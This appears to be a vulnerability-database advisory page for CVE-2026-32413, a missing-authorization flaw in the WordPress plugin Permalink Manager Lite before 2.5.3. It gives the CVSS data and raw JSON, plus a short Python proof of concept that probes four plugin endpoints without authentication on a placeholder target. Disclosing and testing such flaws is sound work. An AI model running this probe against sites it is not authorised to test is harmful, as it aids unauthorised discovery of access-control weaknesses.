Security Vulnerability Report
中文
CVE-2026-32413 CVSS 5.3 MEDIUM

CVE-2026-32413

Published: 2026-03-13 19:54:58
Last Modified: 2026-04-29 10:17:07

Description

Missing Authorization vulnerability in Maciej Bis Permalink Manager Lite permalink-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Permalink Manager Lite: from n/a through < 2.5.3.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Permalink Manager Lite < 2.5.3
Permalink Manager Pro < 2.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32413 PoC - Missing Authorization in Permalink Manager Lite # Target: WordPress site with Permalink Manager Lite < 2.5.3 target_url = "http://target-wordpress-site.com" # Check if the plugin is installed and vulnerable # Endpoint 1: Try to access permalink manager settings without authentication endpoints = [ "/wp-admin/admin-ajax.php?action=permalink-manager-pro-redirects", "/wp-admin/admin-ajax.php?action=permalink-manager-get-uris", "/wp-json/permalink-manager/v1/settings", "/wp-admin/admin.php?page=permalink-manager" ] for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, timeout=10) # Check if we get a successful response without authentication if response.status_code == 200: print(f"[+] Vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {response.text[:200]}") else: print(f"[-] Endpoint returned: {response.status_code}") except requests.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") print("\n[!] Note: This PoC demonstrates the authorization bypass. Use responsibly.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32413", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:58.400", "lastModified": "2026-04-29T10:17:07.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Maciej Bis Permalink Manager Lite permalink-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Permalink Manager Lite: from n/a through < 2.5.3."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Maciej Bis Permalink Manager Lite permalink-manager permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Permalink Manager Lite: desde n/a hasta &lt; 2.5.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/permalink-manager/vulnerability/wordpress-permalink-manager-lite-plugin-2-5-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}